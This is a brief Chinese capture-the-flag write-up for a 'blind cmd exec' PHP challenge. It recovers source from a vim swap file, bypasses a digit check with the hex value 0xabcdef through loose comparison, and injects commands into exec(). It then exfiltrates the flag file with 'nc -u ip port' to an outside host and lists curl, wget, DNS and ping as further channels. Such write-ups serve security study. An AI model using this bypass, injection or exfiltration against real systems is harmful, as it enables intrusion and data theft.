扫描拿源码
- index.php
- .index.php.swp
下载备份文件并用vi恢复
$vi -r index.php
<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
<?php
/*
flag in flag233.php
*/
function check($number)
{
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == '11259375';
}
if(isset($_GET[sign])&& check($_GET[sign])){
setcookie('auth','tcp tunnel is forbidden!');
if(isset($_POST['cmd'])){
$command=$_POST[cmd];
$result=exec($command);
//echo $result;
}
}else{
die('no sign');
}
?>
</body>
</html>
绕过
- 用十六进制绕过php弱类型相等0xabcdef==11259375,这样就不包含1-9这几个字符了
带出数据
-
tcp被禁止所以可以采用nc的udp模式或者dns带出数据
cmd=nc -u ip port < flag233.php - curl
- nc
- dns
- wget
- ping